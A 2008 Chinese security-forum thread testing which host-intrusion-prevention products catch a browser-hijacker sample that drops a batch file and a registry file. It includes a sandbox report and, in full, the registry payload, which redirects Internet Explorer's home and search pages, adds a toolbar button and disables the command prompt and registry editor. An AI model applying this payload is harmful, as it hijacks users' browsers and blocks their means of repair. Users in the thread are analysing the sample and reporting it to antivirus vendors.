看看谁的主动防御有反映

pctool

很多号称有HIPS功能的名不符实 呵呵
能通过HIPS的防御，其实这个精华在于释放一个批处理和一个reg文件，利用那个批处理修改注册表，源文件并不直接对注册表修改。
所以大部分HIPS没有任何反映很正常。我记得微点也是在某个版本吸取了经验，从那以后也针对批处理做出检测

[ General information ]
    * File length:       216171 bytes.
    * MD5 hash: c12da27e0713c083105013614c112384.

[ Changes to filesystem ]
    * Creates directory C:.
    * Creates directory C:\WINDOWS.
    * Creates directory C:\WINDOWS\.
    * Creates directory C:\WINDOWS\\system32.
    * Creates directory C:\WINDOWS\\system32\.
    * Creates file C:\WINDOWS\system32\badu.bat.
    * Creates file C:\WINDOWS\system32\badu.ico.
    * Creates file C:\WINDOWS\system32\badu.reg.

[ Changes to registry ]
    * Accesses Registry key "HKCU\Software\WinRAR SFX".
    * Creates key "HKCU\Software\WinRAR SFX".
    * Sets value "C%%WINDOWS%%system32%%"="C:\WINDOWS\\system32\\" in key "HKCU\Software\WinRAR SFX".

[ Process/window information ]
    * Creates a dialogbox with caption "WinRAR 赉媷?.
    * Buttons found in dialogbox: id102[278,173]"O?&W)..." id1[211,223]"壟" id2[278,223]"謭" .
    * Creates a dialogbox with caption "".
    * Buttons found in dialogbox: id1[211,223]"プ" id2[278,223]"逸" .
    * Pressing button with id 1 "".
    * Attemps to NULL C:\WINDOWS\\system32\\badu.bat NULL.
    * Creates process "CMD.EXE".

[ Signature Scanning ]
    * C:\WINDOWS\system32\badu.bat (37 bytes) : no signature detection.
    * C:\WINDOWS\system32\badu.ico (25214 bytes) : no signature detection.
    * C:\WINDOWS\system32\badu.reg (1695 bytes) : no signature detection.

[ 本帖最后由 pctool 于 2008-11-16 01:03 编辑 ]

08红伞威点

扫描结果 :	全部的杀毒软件报告没有发现病毒!
时间 :	2008/11/14 15:23:50

多引擎病毒扫描网:http://virscan.org/report/1f6239984ea0bb4febc36d0fb3a87cd6.html

shmily512099

运行后，在system32下生成一个批处理，批处理的任务就是导入注册表，这个是注册表的内容：

Windows Registry Editor Version 5.00
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\Extensions\{6096E38F-5AC1-4391-8EC4-75DFA92FB32F}]
"CLSID"="{1FBA04EE-3024-11D2-8F1F-0000F87ABD16}"
"Default Visible"="Yes"
"ButtonText"="八度全能搜索"
"Exec"="http://www.badu.cc"
"HotIcon"="%windir%\\system32\\badu.ICO"
"Icon"="%windir%\\system32\\badu.ICO"
[HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main]
"NoUpdateCheck"=dword:00000001
"NoJITSetup"=dword:00000001
"Disable Script Debugger"="yes"
"Show_ChannelBand"="No"
"Anchor Underline"="yes"
"Cache_Update_Frequency"="Once_Per_Session"
"Display Inline Images"="yes"
"Do404Search"=hex:01,00,00,00
"Save_Session_History_On_Exit"="no"
"Show_FullURL"="no"
"Show_StatusBar"="yes"
"Show_ToolBar"="yes"
"Show_URLinStatusBar"="yes"
"Show_URLToolBar"="yes"
"Start Page"="http://www.badu.cc/"
"Use_DlgBox_Colors"="yes"
"Search Page"="http://www.badu.cc/"
"FullScreen"="no"
"Enable AutoImageResize"="yes"
"CNSMenu"=dword:de809d5c
"CNSHint"=dword:00000001
"CNSReset"=dword:de809d5c
"CNSEnable"=dword:00000001
"CNSList"=dword:00000001
"CNSAutoUpdate"=dword:00000001
"Use Search Asst"="no"
"Search Bar"="http://www.badu.cc/"
"Enable Browser Extensions"="yes"
"NotifyDownloadComplete"="yes"
"Use FormSuggest"="yes"
"ShowedCheckBrowser"="Yes"
"Check_Associations"="Yes"
"Error Dlg Displayed On Every Error"="no"
"AddToFavoritesExpanded"=dword:00000001
[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System]
"DisableCMD"=dword:00000001
"DisableRegistryTools"=dword:00000001
[HKEY_CURRENT_USER\Software\Policies\Microsoft\Internet Explorer\Control Panel]
"HomePage"=dword:00000001


强烈BS这种宣传网站的手法，有本事自己做SEO去！何必做这种见不得人的事。

shmily512099

这个本来就不是病毒   批处理就一句话，然后就是注册表了。这个是来测试主动防御的！    没有主动防御的就不必来了。

shmily512099

可能今晚就有软件收录特征了吧！

08红伞威点

原帖由 shmily512099 于 2008-11-14 15:31 发表
这个本来就不是病毒   批处理就一句话，然后就是注册表了。这个是来测试主动防御的！    没有主动防御的就不必来了。

嗯，上报一下。

sam.to

好,我也上报卡巴!

[ 本帖最后由 kato9096 于 2008-11-14 15:46 编辑 ]

shmily512099

卡巴2009来试试！

江湖的fans

就这样

[ 本帖最后由 江湖的fans 于 2008-11-14 18:05 编辑 ]

xp109

我的毛豆规则太强了，除了我自己的信任的一些常用程序外，其它程序一律阻止运行